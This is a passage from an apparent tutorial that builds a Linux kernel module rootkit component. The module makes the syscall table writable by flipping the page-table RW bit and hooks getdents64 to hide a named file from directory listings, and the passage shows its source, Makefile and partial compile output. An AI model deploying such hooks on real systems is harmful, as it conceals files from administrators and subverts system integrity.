class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="k"typedef/spanspan class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"long/spanspan class="w" /spanspan class="n"pteval_t/spanspan class="p";/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pSo basically this is a structure of 1 member of type codeunsigned long/code. The question now becomes how do we manipulate this to make the section of memory writable./p pAfter more grepping through the kernel source it appears the answer to our questions is in codearch/x86/include/asm/pgtable_types.h/code, here is an excerpt:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="cp"#define _PAGE_BIT_PRESENT 0 /spanspan class="cm"/* is present *//spanspan class="cp"/span/span span class="code-line"span class="cp"#define _PAGE_BIT_RW 1 /spanspan class="cm"/* writeable *//spanspan class="cp"/span/span span class="code-line"span class="cp"#define _PAGE_BIT_USER 2 /spanspan class="cm"/* userspace addressable *//spanspan class="cp"/span/span span class="code-line"span class="cp"#define _PAGE_BIT_PWT 3 /spanspan class="cm"/* page write through *//spanspan class="cp"/span/span span class="code-line"span class="cp"#define _PAGE_BIT_PCD 4 /spanspan class="cm"/* page cache disabled *//spanspan class="cp"/span/span span class="code-line"span class="cp"#define _PAGE_BIT_ACCESSED 5 /spanspan class="cm"/* was accessed (raised by CPU) *//spanspan class="cp"/span/span span class="code-line"span class="cp"#define _PAGE_BIT_DIRTY 6 /spanspan class="cm"/* was written to (raised by CPU) *//spanspan class="cp"/span/span span class="code-line"span class="cp"#define _PAGE_BIT_PSE 7 /spanspan class="cm"/* 4 MB (or 2MB) page *//spanspan class="cp"/span/span span class="code-line"span class="cp"#define _PAGE_BIT_PAT 7 /spanspan class="cm"/* on 4KB pages *//spanspan class="cp"/span/span span class="code-line"span class="cp"#define _PAGE_BIT_GLOBAL 8 /spanspan class="cm"/* Global TLB entry PPro+ *//spanspan class="cp"/span/span span class="code-line"span class="cp"#define _PAGE_BIT_UNUSED1 9 /spanspan class="cm"/* available for programmer *//spanspan class="cp"/span/span span class="code-line"span class="cp"#define _PAGE_BIT_IOMAP 10 /spanspan class="cm"/* flag used to indicate IO mapping *//spanspan class="cp"/span/span span class="code-line"span class="cp"#define _PAGE_BIT_HIDDEN 11 /spanspan class="cm"/* hidden by kmemcheck *//spanspan class="cp"/span/span span class="code-line"span class="cp"#define _PAGE_BIT_PAT_LARGE 12 /spanspan class="cm"/* On 2MB or 1GB pages *//spanspan class="cp"/span/span span class="code-line"span class="cp"#define _PAGE_BIT_SPECIAL _PAGE_BIT_UNUSED1/span/span span class="code-line"span class="cp"#define _PAGE_BIT_CPA_TEST _PAGE_BIT_UNUSED1/span/span span class="code-line"span class="cp"#define _PAGE_BIT_SPLITTING _PAGE_BIT_UNUSED1 /spanspan class="cm"/* only valid on a PSE pmd *//spanspan class="cp"/span/span span class="code-line"span class="cp"#define _PAGE_BIT_NX 63 /spanspan class="cm"/* No execute: only valid after cpuid check *//spanspan class="cp"/span/span span class="code-line"span class="p".../spanspan class="w"/span/span span class="code-line"span class="cp"#define _PAGE_PRESENT (_AT(pteval_t, 1) lt;lt; _PAGE_BIT_PRESENT)/span/span span class="code-line"span class="cp"#define _PAGE_RW (_AT(pteval_t, 1) lt;lt; _PAGE_BIT_RW)/span/span span class="code-line"span class="cp"#define _PAGE_USER (_AT(pteval_t, 1) lt;lt; _PAGE_BIT_USER)/span/span span class="code-line"span class="cp"#define _PAGE_PWT (_AT(pteval_t, 1) lt;lt; _PAGE_BIT_PWT)/span/span span class="code-line"span class="cp"#define _PAGE_PCD (_AT(pteval_t, 1) lt;lt; _PAGE_BIT_PCD)/span/span span class="code-line"span class="cp"#define _PAGE_ACCESSED (_AT(pteval_t, 1) lt;lt; _PAGE_BIT_ACCESSED)/span/span span class="code-line"span class="cp"#define _PAGE_DIRTY (_AT(pteval_t, 1) lt;lt; _PAGE_BIT_DIRTY)/span/span span class="code-line"span class="cp"#define _PAGE_PSE (_AT(pteval_t, 1) lt;lt; _PAGE_BIT_PSE)/span/span span class="code-line"span class="cp"#define _PAGE_GLOBAL (_AT(pteval_t, 1) lt;lt; _PAGE_BIT_GLOBAL)/span/span span class="code-line"span class="cp"#define _PAGE_UNUSED1 (_AT(pteval_t, 1) lt;lt; _PAGE_BIT_UNUSED1)/span/span span class="code-line"span class="cp"#define _PAGE_IOMAP (_AT(pteval_t, 1) lt;lt; _PAGE_BIT_IOMAP)/span/span span class="code-line"span class="cp"#define _PAGE_PAT (_AT(pteval_t, 1) lt;lt; _PAGE_BIT_PAT)/span/span span class="code-line"span class="cp"#define _PAGE_PAT_LARGE (_AT(pteval_t, 1) lt;lt; _PAGE_BIT_PAT_LARGE)/span/span span class="code-line"span class="cp"#define _PAGE_SPECIAL (_AT(pteval_t, 1) lt;lt; _PAGE_BIT_SPECIAL)/span/span span class="code-line"span class="cp"#define _PAGE_CPA_TEST (_AT(pteval_t, 1) lt;lt; _PAGE_BIT_CPA_TEST)/span/span span class="code-line"span class="cp"#define _PAGE_SPLITTING (_AT(pteval_t, 1) lt;lt; _PAGE_BIT_SPLITTING)/span/span span class="code-line"/code/pre/div /td/tr/table pAs you can see, the writable bit is 1 and can be referenced with code_PAGE_RW/code./p pUsing this information its easy to write our functions to make memory writable and readonly again:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="kt"int/spanspan class="w" /spanspan class="nf"set_page_rw/spanspan class="p"(/spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"long/spanspan class="w" /spanspan class="n"addr/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"level/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"pte_t/spanspan class="w" /spanspan class="o"*/spanspan class="n"pte/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"lookup_address/spanspan class="p"(/spanspan class="n"addr/spanspan class="p",/spanspan class="w" /spanspan class="o"amp;/spanspan class="n"level/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"pte/spanspan class="o"-gt;/spanspan class="n"pte/spanspan class="w" /spanspan class="o"amp;~/spanspan class="w" /spanspan class="n"_PAGE_RW/spanspan class="p")/spanspan class="w" /spanspan class="n"pte/spanspan class="o"-gt;/spanspan class="n"pte/spanspan class="w" /spanspan class="o"|=/spanspan class="w" /spanspan class="n"_PAGE_RW/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"set_page_ro/spanspan class="p"(/spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"long/spanspan class="w" /spanspan class="n"addr/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"level/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"pte_t/spanspan class="w" /spanspan class="o"*/spanspan class="n"pte/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"lookup_address/spanspan class="p"(/spanspan class="n"addr/spanspan class="p",/spanspan class="w" /spanspan class="o"amp;/spanspan class="n"level/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"pte/spanspan class="o"-gt;/spanspan class="n"pte/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"pte/spanspan class="o"-gt;/spanspan class="n"pte/spanspan class="w" /spanspan class="o"amp;~/spanspan class="n"_PAGE_RW/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table h2Putting It All Together/h2 pNow we have enough information to build our LKM:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/span span class="code-line"span class="normal"51/span/span span class="code-line"span class="normal"52/span/span span class="code-line"span class="normal"53/span/span span class="code-line"span class="normal"54/span/span span class="code-line"span class="normal"55/span/span span class="code-line"span class="normal"56/span/span span class="code-line"span class="normal"57/span/span span class="code-line"span class="normal"58/span/span span class="code-line"span class="normal"59/span/span span class="code-line"span class="normal"60/span/span span class="code-line"span class="normal"61/span/span span class="code-line"span class="normal"62/span/span span class="code-line"span class="normal"63/span/span span class="code-line"span class="normal"64/span/span span class="code-line"span class="normal"65/span/span span class="code-line"span class="normal"66/span/span span class="code-line"span class="normal"67/span/span span class="code-line"span class="normal"68/span/span span class="code-line"span class="normal"69/span/span span class="code-line"span class="normal"70/span/span span class="code-line"span class="normal"71/span/span span class="code-line"span class="normal"72/span/span span class="code-line"span class="normal"73/span/span span class="code-line"span class="normal"74/span/span span class="code-line"span class="normal"75/span/span span class="code-line"span class="normal"76/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;linux/module.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;linux/init.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;linux/kernel.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;linux/moduleparam.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;linux/unistd.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;linux/semaphore.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;linux/dirent.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;asm/cacheflush.hgt;/spanspan class="cp"/span/span span class="code-line"/span span class="code-line"span class="n"MODULE_AUTHOR/spanspan class="p"(/spanspan class="s"quot;0xe7, 0x1equot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="n"MODULE_DESCRIPTION/spanspan class="p"(/spanspan class="s"quot;Hide a file from getdents syscallsquot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="n"MODULE_LICENSE/spanspan class="p"(/spanspan class="s"quot;GPLquot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="o"**/spanspan class="n"sys_call_table/spanspan class="p";/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="cp"#define FILE_NAME quot;thisisatestfile.txtquot;/span/span span class="code-line"/span span class="code-line"span class="n"asmlinkage/spanspan class="w" /spanspan class="nf"int/spanspan class="w" /spanspan class="p"(/spanspan class="o"*/spanspan class="n"original_getdents64/spanspan class="p")/spanspan class="w" /spanspan class="p"(/spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"fd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="nc"linux_dirent64/spanspan class="w" /spanspan class="o"*/spanspan class="n"dirp/spanspan class="p",/spanspan class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"count/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="n"asmlinkage/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"sys_getdents64_hook/spanspan class="p"(/spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"fd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="nc"linux_dirent64/spanspan class="w" /spanspan class="o"*/spanspan class="n"dirp/spanspan class="p",/spanspan class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"count/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"rtn/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="nc"linux_dirent64/spanspan class="w" /spanspan class="o"*/spanspan class="n"cur/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"dirp/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"i/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"rtn/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"original_getdents64/spanspan class="p"(/spanspan class="n"fd/spanspan class="p",/spanspan class="w" /spanspan class="n"dirp/spanspan class="p",/spanspan class="w" /spanspan class="n"count/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"while/spanspan class="w" /spanspan class="p"(/spanspan class="n"i/spanspan class="w" /spanspan class="o"lt;/spanspan class="w" /spanspan class="n"rtn/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"strncmp/spanspan class="p"(/spanspan class="n"cur/spanspan class="o"-gt;/spanspan class="n"d_name/spanspan class="p",/spanspan class="w" /spanspan class="n"FILE_NAME/spanspan class="p",/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"FILE_NAME/spanspan class="p"))/spanspan class="w" /spanspan class="o"==/spanspan class="w" /spanspan class="mi"0/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"reclen/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"cur/spanspan class="o"-gt;/spanspan class="n"d_reclen/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"next_rec/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="n"cur/spanspan class="w" /spanspan class="o"+/spanspan class="w" /spanspan class="n"reclen/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"len/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="p"(/spanspan class="kt"int/spanspan class="p")/spanspan class="n"dirp/spanspan class="w" /spanspan class="o"+/spanspan class="w" /spanspan class="n"rtn/spanspan class="w" /spanspan class="o"-/spanspan class="w" /spanspan class="p"(/spanspan class="kt"int/spanspan class="p")/spanspan class="n"next_rec/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"memmove/spanspan class="p"(/spanspan class="n"cur/spanspan class="p",/spanspan class="w" /spanspan class="n"next_rec/spanspan class="p",/spanspan class="w" /spanspan class="n"len/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"rtn/spanspan class="w" /spanspan class="o"-=/spanspan class="w" /spanspan class="n"reclen/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"continue/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"i/spanspan class="w" /spanspan class="o"+=/spanspan class="w" /spanspan class="n"cur/spanspan class="o"-gt;/spanspan class="n"d_reclen/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"cur/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="p"(/spanspan class="k"struct/spanspan class="w" /spanspan class="nc"linux_dirent/spanspan class="o"*/spanspan class="p")/spanspan class="w" /spanspan class="p"((/spanspan class="kt"char/spanspan class="o"*/spanspan class="p")/spanspan class="n"dirp/spanspan class="w" /spanspan class="o"+/spanspan class="w" /spanspan class="n"i/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="n"rtn/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="n"set_page_rw/spanspan class="p"(/spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"long/spanspan class="w" /spanspan class="n"addr/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"level/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"pte_t/spanspan class="w" /spanspan class="o"*/spanspan class="n"pte/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"lookup_address/spanspan class="p"(/spanspan class="n"addr/spanspan class="p",/spanspan class="w" /spanspan class="o"amp;/spanspan class="n"level/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"pte/spanspan class="o"-gt;/spanspan class="n"pte/spanspan class="w" /spanspan class="o"amp;~/spanspan class="w" /spanspan class="n"_PAGE_RW/spanspan class="p")/spanspan class="w" /spanspan class="n"pte/spanspan class="o"-gt;/spanspan class="n"pte/spanspan class="w" /spanspan class="o"|=/spanspan class="w" /spanspan class="n"_PAGE_RW/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="n"set_page_ro/spanspan class="p"(/spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"long/spanspan class="w" /spanspan class="n"addr/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"level/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"pte_t/spanspan class="w" /spanspan class="o"*/spanspan class="n"pte/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"lookup_address/spanspan class="p"(/spanspan class="n"addr/spanspan class="p",/spanspan class="w" /spanspan class="o"amp;/spanspan class="n"level/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"pte/spanspan class="o"-gt;/spanspan class="n"pte/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"pte/spanspan class="o"-gt;/spanspan class="n"pte/spanspan class="w" /spanspan class="o"amp;~/spanspan class="n"_PAGE_RW/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="k"static/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"__init/spanspan class="w" /spanspan class="n"getdents_hook_init/spanspan class="p"(/spanspan class="kt"void/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"sys_call_table/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="p"(/spanspan class="kt"void/spanspan class="o"*/spanspan class="p")/spanspan class="mh"0xc1454100/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"original_getdents64/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"sys_call_table/spanspan class="p"[/spanspan class="n"__NR_getdents64/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"set_page_rw/spanspan class="p"(/spanspan class="n"sys_call_table/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sys_call_table/spanspan class="p"[/spanspan class="n"__NR_getdents64/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"sys_getdents64_hook/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="k"static/spanspan class="w" /spanspan class="kt"void/spanspan class="w" /spanspan class="n"__exit/spanspan class="w" /spanspan class="n"getdents_hook_exit/spanspan class="p"(/spanspan class="kt"void/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sys_call_table/spanspan class="p"[/spanspan class="n"__NR_getdents64/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"original_getdents64/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"set_page_ro/spanspan class="p"(/spanspan class="n"sys_call_table/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="n"module_init/spanspan class="p"(/spanspan class="n"getdents_hook_init/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="n"module_exit/spanspan class="p"(/spanspan class="n"getdents_hook_exit/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pI've set the static constant codeFILE_NAME/code to codethisisatestfile.txt/code. Now to edit the codeMakefile/code:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/span span class="code-line"span class="normal"8/span/span span class="code-line"span class="normal"9/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="nv"obj-m/span span class="o"+=/span hello.o/span span class="code-line"span class="nv"obj-m/span span class="o"+=/span reverse.o/span span class="code-line"span class="nv"obj-m/span span class="o"+=/span hidefile.o/span span class="code-line"/span span class="code-line"span class="nf"all/spanspan class="o":/span/span span class="code-line" make -C /lib/modules/span class="k"$(/spanshell uname -rspan class="k")/span/build span class="nv"M/spanspan class="o"=/spanspan class="k"$(/spanPWDspan class="k")/span modules/span span class="code-line"/span span class="code-line"span class="nf"clean/spanspan class="o":/span/span span class="code-line" make -C /lib/modules/span class="k"$(/spanshell uname -rspan class="k")/span/build span class="nv"M/spanspan class="o"=/spanspan class="k"$(/spanPWDspan class="k")/span clean/span span class="code-line"/code/pre/div /td/tr/table pNow to compile and test:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"root@dev:~/lkms# /spanmake/span span class="code-line"span class="go"make -C /lib/modules/3.14-kali1-686-pae/build M=/root/lkms modules/span/span span class="code-line"span class="go"make[1]: Entering directory `/usr/src/linux-headers-3.14-kali1-686-pae#39;/span/span span class="code-line"span class="go" CC [M] /root/lkms/hidefile.o/span/span span class="code-line"span class="go"/root/lkms/hidefile.c: In function ‘sys_getdents64_hook’:/span/span span class="code-line"span class="go"/root/lkms/hidefile.c:36:21: warning: assignment from incompatible pointer type [enabled by default]/span/span span class="code-line"span class="go"/root/lkms/hidefile.c: In function ‘getdents_hook_init’:/span/span span class="code-line"span class="go"/root/lkms/hidefile.c:63:2: warning: passing argument 1 of ‘set_page_rw’ makes integer from pointer without a cast [enabled by default]/span/span span class="code-line"span class="go"/root/lkms/hidefile.c:41:5: note: expected ‘long unsigned 